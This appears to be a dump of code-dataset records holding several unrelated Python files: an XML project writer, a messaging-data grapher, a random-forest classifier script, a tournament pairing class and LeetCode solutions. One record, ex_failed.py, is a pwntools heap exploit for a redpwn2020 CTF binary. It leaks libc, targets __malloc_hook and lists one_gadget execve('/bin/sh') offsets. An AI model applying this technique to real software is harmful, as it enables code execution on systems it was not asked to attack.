pS(each_FTEvent.RelatedCX.ID)\n\n\t\t\t\t\t\t\t#ConnectTo\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectTo = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.ConnectToTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_ConnectTo.text = pS(str(each_FTEvent))\n\n\t\t\t\t\t\t#Numbering\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnectorIn_Numbering = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnectorIn, info.NumberingTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnectorIn_Numbering.text = pS(str(each_FTEvent))\n\n\t\t\t\t\t\t#Style\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Style = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.StyleTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_Style.text = pS(str(each_FTEvent.Style))\n\n\t\t\t\t\t\t#RiskReceptors\n\t\t\t\t\t\tif len(each_FTEvent.ApplicableRiskReceptors) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RiskReceptors = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector, info.RiskReceptorsTag)\n\t\t\t\t\t\t\teach_RiskReceptor: core_classes.RiskReceptorItem\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTConnector_RiskReceptors.text = pS(','.join(list(map(lambda each_RiskReceptor: each_RiskReceptor.ID,each_FTEvent.ApplicableRiskReceptors))))\n\n\t\t\t#TolRiskModel\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolRiskModel = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TolRiskModelTag)\n\t\t\teach_FaultTree.MyTolRiskModel: core_classes.TolRiskModel\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolRiskModel = pS(each_FaultTree.MyTolRiskModel.ID)\n\n\t\t\t#Severity\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SeverityTag)\n\n\t\t\teach_list_of_keys: core_classes.RiskReceptorItem\n\t\t\tfor each_list_of_keys in each_FaultTree.Severity:\n\t\t\t\t# RR\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity, info.RRTag)\n\t\t\t\t# Name\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_Name = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity_RR, info.NameTag)\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_Name.text = pS(each_list_of_keys.XMLName)\n\t\t\t\t# SeverityValue\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_SeverityValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Severity_RR, info.SeverityValueTag)\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Severity_RR_SeverityValue.text = pS(each_FaultTree.Severity.get(each_list_of_keys))\n\n\t\t\t\tpass\n\n\t\t\t#TolFreq\n\t\t\t#TODO\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolFreq = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TolFreqTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TolFreq.text = pS(str(each_FaultTree.TolFreq))\n\n\t\t\t#RRGrouping\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_RRGrouping = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.RRGroupingTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_RRGrouping.text = pS(each_FaultTree.RRGroupingOption)\n\n\t\t\tif len(each_FaultTree.CollapseGroups) > 0:\n\t\t\t\t# CollapseGroups\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroups = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree,info.CollapseGroupsTag)\n\t\t\t\tfor each_CollapseGroup in CollapseGroups:\n\t\t\t\t\tassert type(each_CollapseGroup) == faulttree.FTCollapseGroupInCore\n\t\t\t\t\t# CollapseGroup\n\t\t\t\t\teach_CollapseGroup: faulttree.FTCollapseGroupInCore\n\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroup = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_CollapseGroups, info.CollapseGroupTag)\n\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_CollapseGroup.text = pS(str(each_CollapseGroup.ID))\n\n\t\t\t#ModelGate\n\t\t\tif each_FaultTree.ModelGate is not None:\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_ModelGate = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.ModelGateTag)\n\t\t\t\teach_FaultTree.ModelGate: faulttree.FTGateItemInCore\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_ModelGate.text = pS(str(each_FaultTree.ModelGate.ID))\n\n\t\t\tpass\n\n\t#Comment\n\tif len(Proj.Comments) > 0:\n\t\tMyXMLRoot_Comments = ET.SubElement(MyXMLRoot, info.CommentsTag)\n\n\t\teach_Comment: core_classes.Comment\n\t\tfor each_Comment in Proj.Comments:\n\t\t\tassert type(each_Comment) == core_classes.Comment\n\t\t\tMyXMLRoot_Comments_Comment = ET.SubElement(MyXMLRoot_Comments,info.CommentTag)\n\n\t\t\tMyXMLRoot_Comments_Comment_Id = ET.SubElement(MyXMLRoot_Comments_Comment, info.IDTag)\n\t\t\tMyXMLRoot_Comments_Comment_Id.text = pS(str(each_Comment.iD))\n\n\t\t\tMyXMLRoot_Comments_Comment_Content = ET.SubElement(MyXMLRoot_Comments_Comment, info.ContentTag)\n\t\t\tMyXMLRoot_Comments_Comment_Content.text = pS(str(each_Comment.content))\n\n\t\t\tMyXMLRoot_Comments_Comment_isVisible = ET.SubElement(MyXMLRoot_Comments_Comment, info.isVisibleTag)\n\t\t\tMyXMLRoot_Comments_Comment_isVisible.text = pS(str(each_Comment.isVisible))\n\n\t\t\tMyXMLRoot_Comments_Comment_showInReport = ET.SubElement(MyXMLRoot_Comments_Comment, info.showInReportTag)\n\t\t\tMyXMLRoot_Comments_Comment_showInReport.text = pS(str(each_Comment.showInReport))\n\n\n\n\tpass\n\n\t# later, add more code here to write all PHA objects into the XML tree\n\t# write the XML file\n\n\t# generate tag Id for all element\n\tautoGenerateTagID(MyXMLRoot)\n\n\tMyXMLTree.write(ProjectFilename, encoding=\"UTF-8\", xml_declaration=True)\n\n\t'''\n\t#J: Display XML tree on screen\n\tET.dump(MyXMLTree)\n\t'''\n\tpass\n\n\"\"\" ----------Project > XML----------]\"\"\" \n\n\"\"\"[----------XML > Project---------- \"\"\"\n\n\n\"\"\" ----------XML > Project----------]\"\"\" \n\n\"\"\"[----------TESTING AREA---------- \"\"\"\n\ndef testCheckType(stringInput: str) -> str:\n\tpass\n\n# Timer decorator - Start\n# Author: Jack Leung\nimport time\ndef timer(func):\n def runFunction(*args, **kwargs):\n beginTime = time.time()\n print(\"Function {0} is called.\".format(func.__name__))\n func(*args,**kwargs)\n endTime = time.time() - beginTime\n #TODO: cannot show proper function name\n print(\"Function {0} has run for {1} seconds.\".format(func.__name__, endTime))\n return runFunction\n# Timer decorator - End\n\n\"\"\" ----------TESTING AREA----------]\"\"\" \n\n\"\"\"[----------RUN MAIN PROGRAM---------- \"\"\"\n@timer\ndef main():\n\tprojects.runUnitTest()\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n\"\"\" ----------RUN MAIN PROGRAM----------]\"\"\" \n","sub_path":"vizop_parser.py","file_name":"vizop_parser.py","file_ext":"py","file_size_in_byte":35092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"538379841","text":"from pwn import *\n\ndef new(size, contents):\n p.sendlineafter(':', '1')\n p.sendlineafter(':', '0')\n p.sendlineafter(':', str(size))\n p.sendlineafter(':', contents)\n\ndef delete():\n p.sendlineafter(':', '2')\n p.sendlineafter(':', str('0'))\n\ndef show():\n p.sendlineafter(':', '3')\n p.sendlineafter(':', str('0'))\n return p.recvuntil('free}}')\n\ncontext.update(log_level='debug')\np = process('bin/four-function-heap')\n#p = remote('2020.redpwnc.tf', 31774)\n\nnew(300, 'A'*299) #0\ndelete() #1\n\n#dummy chunk\nnew(100, 'B'*99) #2\n\nnew(300, 'C'*299)#3\nfor i in range(8):\n delete() #11\naddr_libc = u64(show().split('{{')[0][-7:-1].ljust(8, '\\x00')) #12\n\n\nlog.info('libc: ' + hex(addr_libc))\noffset_libc = 0x3ebca0\naddr_libc_base = addr_libc - offset_libc\nlog.info('libc: ' + hex(addr_libc_base))\n\n\noffset_mallocHook = 0x3ebc30\naddr_mallocHook = addr_libc_base + offset_mallocHook\nlog.info('__malloc_hook: ' + hex(addr_mallocHook))\n\n\nraw_input('debug:' + str(p.pid))\n#new(300, p64(addr_mallocHook)*(299/8)) \nnew(30, p64(addr_mallocHook)+p64(0)) #13\nnew(300, p64(0xdeadbeefdeadbeef)) #14\n#new(30, 'test')\n'''\n0x4f2c5 execve(\"/bin/sh\", rsp+0x40, environ)\nconstraints:\n rsp & 0xf == 0\n rcx == NULL\n\n0x4f322 execve(\"/bin/sh\", rsp+0x40, environ)\nconstraints:\n [rsp+0x40] == NULL\n\n0x10a38c execve(\"/bin/sh\", rsp+0x70, environ)\nconstraints:\n [rsp+0x70] == NULL\n'''\n\n\np.interactive()\n\n\n","sub_path":"redpwn2020/four-function-heap/ex_failed.py","file_name":"ex_failed.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"91241402","text":"#!/usr/bin/env python3\n\"\"\" Automated Graphing of Facebook Messaging Data \"\"\"\n\nimport json\nimport pprint\nfrom collections import namedtuple, OrderedDict\nimport os\nimport datetime\nfrom dateutil.parser import parse\nimport pickle as pkl\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as mdates\nfrom matplotlib import cm\n\n__author__ = \"Rohan Pandit\"\n__copyright__ = \"Copyright {0}\".format(datetime.date.today().year)\n\npp = pprint.PrettyPrinter(indent=4)\n\nMessage = namedtuple(\"Message\", ['person', 'timestamp', 'content'])\n\ndef main():\n\tos.chdir(\"Messages\")\n\n\t\"\"\"\n\tmessages = loadMessages()\n\tmessages += loadHangouts()\n\tmessages += loadHangouts('2')\n\tpkl.dump(messages, open(\"../messages.pkl\", 'wb'))\n\t\"\"\"\n\n\tmessages = pkl.load(open(\"../messages.pkl\", 'rb'))\n\tprint(\"Total Messages: \", len(messages), \"\\n\")\n\n\tstart_date = parse('7/26/14')\n\tend_date = parse('6/20/15')\n\tdelta = (end_date - start_date).days\n\t\n\tpeople_msgs = {}\n\n\tfor msg in messages:\n\t\tif msg.person in people_msgs.keys():\n\t\t\tif start_date < msg.timestamp < end_date:\n\t\t\t\tidx = (msg.timestamp - start_date).days\n\t\t\t\tpeople_msgs[msg.person][idx] += 1\n\t\telse:\n\t\t\tpeople_msgs[msg.person] = np.zeros(delta)\n\n\tpeople_msgs = OrderedDict( sorted(people_msgs.items(), key=lambda i: -sum(i[1])) )\n\n\tdata = pd.DataFrame(people_msgs, index=pd.date_range(start_date, periods=delta))\n\ttop10 = data.iloc[:,:15]\n\tprint(top10.describe())\n\tmean = data.mean().sum()\n\tprint(\"Mean: \", mean)\t\n\n\ttoPlot = cumMsgPlot(data, 10)\n\t\n\tax = toPlot.plot(title=\"Cumulative Messaging Data (Top 10)\")\n\n\tpyplot.show()\n\tplotTotalMessages(messages, start_date, end_date)\n\ndef cumMsgPlot(data, x):\n\tsum_data = data.apply(np.cumsum)\n\treturn sum_data.iloc[:,:x]\n\ndef totalMsgsTopXPlot(data, x): #bar graph\n\tsum_data = data.iloc[:,:x].sum(axis=0)\n\treturn sum_data\n\ndef numTalkedToPlot(data, min_messages=1, rolling=1):\n\ttalkedTo = data[ min_messages > data ]\n\ttalkedTo = pd.isnull(talkedTo)\n\ttoPlot = talkedTo.iloc[:,:].sum(axis=1)\n\treturn pd.rolling_mean(toPlot, rolling)\n\ndef topXPlot(data, x, rolling=1):\n\tothers = data.iloc[:,:x].sum(axis=1)\n\ttop = data.iloc[:,x:]\n\ttop['Other'] = others\n\treturn pd.rolling_mean(top, rolling)\n\ndef everyonePlot(data, rolling=1):\n\tsum_data = data.iloc[:,:].sum(axis=1)\n\treturn pd.rolling_mean(sum_data, rolling)\n\ndef loadMessages():\n\tdecoded_jsons = []\n\tfor _id in os.listdir():\n\t\tif _id[0] != '.' and _id[0] != '_' and _id[0] != 'H' and _id[0] != 'm': \n\t\t\ttry:\n\t\t\t\tencoded_jsons = open(_id + \"/0-40000.json\",\"r\").read()\n\t\t\texcept FileNotFoundError:\n\t\t\t\ttry:\n\t\t\t\t\tencoded_jsons = open(_id + \"/0-23000.json\",\"r\").read()\t\n\t\t\t\texcept FileNotFoundError:\n\t\t\t\t\tprint(\"exception! \", _id)\n\n\t\t\tdecoded_jsons += json.loads(encoded_jsons)[\"payload\"][\"actions\"]\n\n\n\tprint(\"Total FB Messages: \", len(decoded_jsons))\n\tmessages = []\n\n\tfor decoded_json in decoded_jsons:\n\n\t\tif str(decoded_json['other_user_fbid']) in people.keys():\n\t\t\tperson = getPerson(decoded_json['other_user_fbid'])\n\t\telse:\n\t\t\tperson = str(decoded_json['other_user_fbid'])\n\t\t\tif person == 'None':\n\t\t\t\tperson = decoded_json['author'][5:]\n\t\t\t\tif str(person) in people.keys():\n\t\t\t\t\tperson = getPerson(person)\n\t\ttry:\n\t\t\ttimestamp = parse(decoded_json['timestamp_datetime'])\n \t\t\t#TODO: Fix dates for last week \n\t\texcept ValueError:\n\t\t\ttimestamp = parseDate(decoded_json['timestamp_datetime'])\n\t\ttry:\n\t\t\tcontent = decoded_json['body']\n\t\texcept KeyError:\n\t\t\tcontent = \"\"\n\n\t\tif person == 'None':\n\t\t\tpp.pprint(decoded_json)\n\t\t\tquit()\n\n\t\tmessages.append(Message(person, timestamp, content))\n\n\treturn messages\n\ndef loadHangouts(a=''):\n\tmessages = []\n\tdecoded_json = json.loads(open(\"Hangouts%s.json\"%a).read())\n\n\tlen_convo = lambda i: len(i['conversation_state']['event'])\n\tconvos = sorted(decoded_json[\"conversation_state\"], key=len_convo)\n\n\tfor convo in convos:\n\t\tfor msg in convo[\"conversation_state\"][\"event\"]:\n\t\t\ttry:\n\t\t\t\tperson = getPerson(msg['conversation_id']['id'])\n\t\t\texcept KeyError:\n\t\t\t\tperson = str(msg['conversation_id']['id'])\n\n\t\t\ttimestamp = datetime.datetime.fromtimestamp(int(msg['timestamp'])//1000000)\n\n\t\t\ttry:\n\t\t\t\tcontent = msg['chat_message']['message_content']['segment'][0]['text']\n\t\t\texcept KeyError:\n\t\t\t\tcontent = \"\"\n\n\t\t\tif person == 'UgxG4T1spRtMbhsFK854AaABAQ':\n\t\t\t\tprint(content)\n\n\t\t\tmessages.append(Message(person, timestamp, content))\n\n\tprint(\"Total Hangouts: \", len(messages))\n\treturn messages\n\n\ndef plotTotalMessages(messages, start_date, end_date):\n\tstart_date = parse(start_date)\n\tend_date = parse(end_date)\n\tprint(start_date, end_date)\n\n\trecord = {\"\":0}\n\tdate = \"\"\n\n\tfor msg in messages:\n\t\tmsg_date = \"{0}/{1}/{2}\".format(msg.timestamp.month, msg.timestamp.day, msg.timestamp.year)\n\n\t\tif start_date < parse(msg_date) < end_date:\n\n\t\t\tif date == msg_date:\n\t\t\t\trecord[date] += 1\n\t\t\telse:\n\t\t\t\told_date = date\n\t\t\t\tdate = msg_date\n\n\t\t\t\tif date in record.keys():\n\t\t\t\t\trecord[date] += 1\n\t\t\t\telse:\n\t\t\t\t\trecord[date] = 1\n\n\trecord = OrderedDict( sorted( record.items(), key=lambda t: int(parse(t[0]).strftime(\"%s\")) ) )\n\n\tdates = list(map(parse, list(record.keys())))\n\tnumMessages = list(record.values())\n\t\n\tyears = mdates.YearLocator()\n\tmonths = mdates.MonthLocator()\n\tyearsFormat = mdates.DateFormatter('%Y')\n\n\tfig, ax = pyplot.subplots()\n\tax.plot(dates, numMessages)\n\n\t\"\"\"\n\t#format ticks\n\tax.xaxis.set_major_locator(years)\n\tax.xaxis.set_major_locator(yearsFormat)\n\tax.xaxis.set_minor_locator(months)\n\n\tax.set_xlim(min(dates), max(dates))\n\n\tax.format_xdata = mdates.DateFormatter('%Y-%m-%d')\n\tax.grid(True)\n\tfig.autofmt_xdate()\n\t\"\"\"\n\n\tpyplot.show()\n\n\t#pp.pprint(record)\n\n############### Utility Functions ################\n\ndef parseDate(timestamp):\n\ttimestamp = timestamp.split(\" \")\n\tif timestamp[0] == \"Today\":\n\t\treturn datetime.date.today()\n\n\ndef getPerson(_id):\n\treturn people[str(_id)]\n\npeople = {\n\t\t#fill this out yourself :)\n\t\t}\n\nif __name__ == \"__main__\": main()\n","sub_path":"grapher.py","file_name":"grapher.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502696225","text":"\"\"\"Find the similarity between consumption behaviors of sellers\r\nThe trained model is used to predict the probability of selling for each collector.\r\nThe result is written to table likelihood on SQL\r\n\"\"\"\r\nimport sys\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport sklearn\r\nfrom sklearn.metrics import fbeta_score, make_scorer\r\nfrom sklearn.metrics import roc_curve, auc, recall_score, accuracy_score\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom imblearn.over_sampling import SMOTE\r\n\r\nfrom connLocalDB import connDB\r\n\r\nclass RfcCV(object):\r\n \"\"\"\r\n Random Forest Classifer Cross Validation Class\r\n Methods:\r\n train_model: update best_parameter and best_model\r\n evaluate: evaluate on test-dataset, return scores\r\n \"\"\"\r\n def __init__(self ):\r\n # parameters for grid search in the cross-validation\r\n self.param_grid = {\r\n 'n_estimators': [600,800],\r\n 'max_depth':[3,4],\r\n 'min_samples_split':[4,6],\r\n 'class_weight':[{0:1,1:2},{0:1,1:4}],\r\n 'random_state':[42]\r\n }\r\n self.best_model = None\r\n self.best_params = {}\r\n\r\n # Calculate and print the total rounds to run for cross-validation\r\n num_test = 1\r\n for key, val in enumerate(self.param_grid):\r\n num_test *= len(val)\r\n print(\"\\nStart to find the best parameters for random forest classifier using cross-validation.\")\r\n print(\"Total test to run: \"+str(num_test))\r\n\r\n def train_model(self, train_features, train_labels):\r\n # Train the model and update self.best_model\r\n rfc = RandomForestClassifier()\r\n # Instantiate the grid search model\r\n scorer = make_scorer(fbeta_score, beta=1)\r\n grid_search = GridSearchCV(estimator = rfc, param_grid = self.param_grid,\r\n cv = 8, n_jobs = -1, verbose = 1,scoring=scorer) # Using k-folds with cv=10\r\n grid_search.fit(train_features, train_labels)\r\n self.best_params = grid_search.best_params_\r\n self.best_model = grid_search.best_estimator_\r\n print('Best parameters for random forest classifier is: ')\r\n print(str(self.best_params))\r\n\r\n def evaluate(self, test_features, test_labels):\r\n \"\"\"\r\n Evaluate the model performance including\r\n Return: ROC curve, accuracy, recall, precision, and F1\r\n \"\"\"\r\n def plot_roc(test_labels):\r\n \"\"\"\r\n Plot ROC curve\r\n \"\"\"\r\n y_pred_grd = self.best_model.predict_proba(test_features)[:, 1]\r\n fpr_rf, tpr_rf, _ = roc_curve(test_labels, y_pred_grd)\r\n plt.plot(fpr_rf,tpr_rf)\r\n plt.show()\r\n print(\"fpr_rf, tpr_rf\")\r\n print(fpr_rf)\r\n print(tpr_rf)\r\n\r\n predictions = self.best_model.predict(test_features)\r\n plot_roc(test_labels, predictions)\r\n recallScore = sklearn.metrics.recall_score(test_labels, predictions)\r\n f1lScore = sklearn.metrics.f1_score(test_labels, predictions)\r\n\r\n # Accuracy score\r\n errors = abs(predictions - test_labels)\r\n mape = 100 * np.sum(errors)/np.size(errors,0)\r\n accuracy = 100 - mape\r\n\r\n print('Model Performance')\r\n print('Average Error: {:0.4f} degrees.'.format(np.mean(errors)))\r\n print('Accuracy = {:0.2f}%.'.format(accuracy))\r\n return accuracy, recallScore, f1lScore\r\n\r\n\r\ndef get_data():\r\n \"\"\"\r\n Grep data from local SQL database\r\n :return: DataFrame containing train and test data\r\n \"\"\"\r\n engine, _ = connDB()\r\n features_query = \"\"\"\r\n SELECT * From features;\r\n \"\"\"\r\n # Grep and process data\r\n features = pd.read_sql_query(features_query, engine, index_col='userId')\r\n features = features.drop(columns='index')\r\n features = features.fillna(value=0)\r\n features['sumFeatures'] = features.iloc[:,:-1].sum(axis=1)\r\n\r\n # Remove sellers from Ebay\r\n print(\"Total sellers before removing ebay-migrant is \"+ str(features[features['selling']==1].shape[0]))\r\n features = features[np.logical_or(features['selling']==0, np.logical_and(features['selling']==1,features['sumFeatures']>=3))]\r\n print(\"Total sellers after removing ebay-migrant is\"+ str(features[features['selling']==1].shape[0]))\r\n features = features.drop('sumFeatures',axis=1)\r\n\r\n # Recent 3-month records for prediction\r\n features_3month_query = \"\"\"\r\n select * \r\n from featuresrecent3month\r\n \"\"\"\r\n features_recent_3month = pd.read_sql_query(features_3month_query, engine, index_col='userId')\r\n features_recent_3month = features_recent_3month.drop(columns='index')\r\n return features, features_recent_3month\r\n\r\n\r\ndef write_result(result):\r\n \"\"\"\r\n Grep data from local SQL database\r\n :return: DataFrame containing train and test data\r\n \"\"\"\r\n engine, _ = connDB()\r\n result.to_sql('likelihood', engine, if_exists='replace')\r\n\r\n\r\ndef resample_training(X_train, y_train, oversample=False):\r\n \"\"\"\r\n oversample: if true use the under-sampling+SMOLE, else only use under-sampling only\r\n :return: the resampled training and test sets.\r\n \"\"\"\r\n train_matrix = X_train.join(y_train)\r\n train_resampled_neg = train_matrix[train_matrix['selling'] == 0].sample(frac=0.01, random_state=42)\r\n train_resampled_pos = train_matrix[train_matrix['selling'] == 1]\r\n print(\"Number of sellers in training set is\", str(train_resampled_pos.shape[0]), \"and\", str(\r\n train_resampled_neg.shape[0]), \"are not.\")\r\n\r\n X_train_resampled = train_resampled_neg.append(train_resampled_pos).iloc[:, :-1]\r\n y_train_resampled = train_resampled_neg.append(train_resampled_pos).iloc[:, -1]\r\n if not oversample:\r\n return X_train_resampled, y_train_resampled\r\n else:\r\n X_train_resampled_oversampled, y_train_resampled_oversampled = SMOTE(kind='borderline1').fit_sample(\\\r\n X_train_resampled, y_train_resampled)\r\n return X_train_resampled_oversampled, y_train_resampled_oversampled\r\n\r\ndef main():\r\n \"\"\"\r\n Train random forest classifier\r\n 1. Create freatures\r\n 2. Split dataset to train/test\r\n 3. Resample data (both undersampling and oversampling)\r\n 4. Train the model\r\n 5. Show test results\r\n \"\"\"\r\n # Split training set and test set.\r\n # Training set is undersanmpled and oversampled. Check function 'resampleTraining'\r\n features,features_recent_3month = get_data() # Features (not split yet) from SQL\r\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(\r\n features.iloc[:,1:-1], features.iloc[:, -1], test_size=0.30, random_state=32)\r\n X_train_resampled_oversampled, y_train_resampled_oversampled = resample_training(X_train, y_train, oversample=True)\r\n print(\"Number of sellers in test set is\", str(sum(y_test)), \"and\", str(sum(y_test == 0)), \"are not.\")\r\n\r\n # Train random_forest_classifer by grid_search\r\n rfc = RfcCV()\r\n print(\"Training model using undersample + oversample\")\r\n rfc.train_model(X_train_resampled_oversampled, y_train_resampled_oversampled)\r\n accu, recallscore, f1Score = rfc.evaluate(X_test, y_test)\r\n\r\n # After model train and test, predict the probability of selling in next month\r\n print(str(accu) + \":\" + str(recallscore) + \":\" + str(f1Score))\r\n y_pred_grd = rfc.best_model.predict_proba(features_recent_3month.iloc[:,1:])\r\n features_recent_3month['likelihood']=y_pred_grd[:,1]\r\n print('Weight for each features:')\r\n print(str(rfc.best_model.feature_importances_))\r\n\r\n # Write result to sql database\r\n write_result(features_recent_3month['likelihood'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.stdout = open('output.txt', 'wt')\r\n main()\r\n","sub_path":"src/modelTraining.py","file_name":"modelTraining.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109344939","text":"import random\nfrom FTC.Match import Match\nfrom FTC.Errors import CrossplatformRoundCreationImpossible,UnevenAmountOfTeams,IllegalPlatformsOnSameTeam\n\nclass Round:\n def __init__(self, teams):\n self.teams = teams\n self._buyoutTeams = []\n self._matches = []\n\n\n def _randomMatchesWithTeams(self, teams):\n return_matches = []\n for _ in range(0, len(teams), 2):\n team1 = teams[random.randint(0, len(teams) - 1)]\n teams.remove(team1)\n team2 = teams[random.randint(0, len(teams) - 1)]\n teams.remove(team2)\n\n match = Match(team1, team2)\n return_matches.append(match)\n return return_matches\n\n def createMatches(self, numOfBuyoutTeams=0, crossplatform_filter=False):\n if ((len(self.teams) - numOfBuyoutTeams) % 2 != 0):\n raise UnevenAmountOfTeams()\n\n if (crossplatform_filter):\n pcTeams = []\n xboxTeams = []\n ps4Teams = []\n for team in self.teams:\n if team.hasPS4 and team.hasXBOX:\n raise IllegalPlatformsOnSameTeam()\n elif team.hasXBOX:\n xboxTeams.append(team)\n elif team.hasPS4:\n ps4Teams.append(team)\n else:\n pcTeams.append(team)\n\n if (len(ps4Teams) == 0):\n teamsToPick = pcTeams + xboxTeams\n matches = self._randomMatchesWithTeams(teamsToPick)\n self._matches = matches\n else:\n if ((len(ps4Teams) + len(pcTeams)) % 2 != 0):\n raise CrossplatformRoundCreationImpossible()\n elif (len(ps4Teams) % 2 == 0):\n self._matches = self._randomMatchesWithTeams(ps4Teams)\n self._matches.extend(self._randomMatchesWithTeams(pcTeams + xboxTeams))\n else:\n pcTeamToBalance = pcTeams[random.randint(0,len(pcTeams)-1)]\n pcTeams.remove(pcTeamToBalance)\n self._matches = self._randomMatchesWithTeams(ps4Teams + [pcTeamToBalance])\n self._matches.extend(self._randomMatchesWithTeams(pcTeams + xboxTeams))\n\n else:\n teamsToPick = self.teams[:]\n for _ in range(numOfBuyoutTeams):\n buyoutTeam = teamsToPick[random.randint(0,len(teamsToPick)-1)]\n teamsToPick.remove(buyoutTeam)\n self._buyoutTeams.append(buyoutTeam)\n\n self._matches.extend(self._randomMatchesWithTeams(teamsToPick))\n\n\n","sub_path":"FTC/Round.py","file_name":"Round.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"345167137","text":"# Leetcode: https://leetcode.com/problems/next-greater-element-i/description/\n\n# You are given two arrays (without duplicates) nums1 and nums2 where nums1’s elements are subset of nums2. Find all the next greater numbers for nums1's elements in the corresponding places of nums2.\n\n# The Next Greater Number of a number x in nums1 is the first greater number to its right in nums2. If it does not exist, output -1 for this number.\n\n# Example 1:\n# Input: nums1 = [4,1,2], nums2 = [1,3,4,2].\n# Output: [-1,3,-1]\n# Explanation:\n# For number 4 in the first array, you cannot find the next greater number for it in the second array, so output -1.\n# For number 1 in the first array, the next greater number for it in the second array is 3.\n# For number 2 in the first array, there is no next greater number for it in the second array, so output -1.\n# Example 2:\n# Input: nums1 = [2,4], nums2 = [1,2,3,4].\n# Output: [3,-1]\n# Explanation:\n# For number 2 in the first array, the next greater number for it in the second array is 3.\n# For number 4 in the first array, there is no next greater number for it in the second array, so output -1.\n# Note:\n# All elements in nums1 and nums2 are unique.\n# The length of both nums1 and nums2 would not exceed 1000.\n\n# Similar as https://leetcode.com/problems/daily-temperatures/, it's to get the first value that is greater than target.\n\n# The idea is that num[i] > num[i+1], then we need to jump to check the number larger than num[i+1]\n\nclass Solution(object):\n def nextGreaterElement(self, findNums, nums):\n \"\"\"\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n valOffSet = [0] * len(nums)\n for i in xrange(len(nums) - 2, -1, -1):\n nextI = i+1\n while nums[i] > nums[nextI]:\n if valOffSet[nextI] == 0:\n nextI = i\n break\n else:\n nextI += valOffSet[nextI]\n valOffSet[i] = nextI - i\n \n rs = []\n for num in findNums:\n i = nums.index(num)\n if valOffSet[i]:\n rs.append(nums[i + valOffSet[i]])\n else:\n rs.append(-1)\n return rs","sub_path":"NextGreaterElementI.py","file_name":"NextGreaterElementI.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"277120442","text":"import heapq\n\n\nclass Solution:\n\n def minMeetingRooms(self, intervals) -> int:\n heap = [] # heaps are simply priority queues\n intervals.sort()\n for start_time, end_time in intervals:\n heapq.heappush(heap, end_time)\n if start_time >= heap[0]:\n heapq.heappop(heap)\n return len(heap)\n\n\ndef main():\n tests = [[[0, 30], [5, 10], [15, 20]],\n [[4, 16], [5, 17], [4, 17], [12, 17]],\n [[6, 15], [13, 20], [6, 17]],\n [[16, 22], [28, 45], [3, 9], [46, 50], [13, 14]],\n [[1, 5], [8, 9], [8, 9]],\n [[20, 45], [12, 13], [2, 50], [14, 20], [3, 5]]]\n for test in tests:\n ret = Solution().minMeetingRooms(test)\n print(ret)\n\n\nif 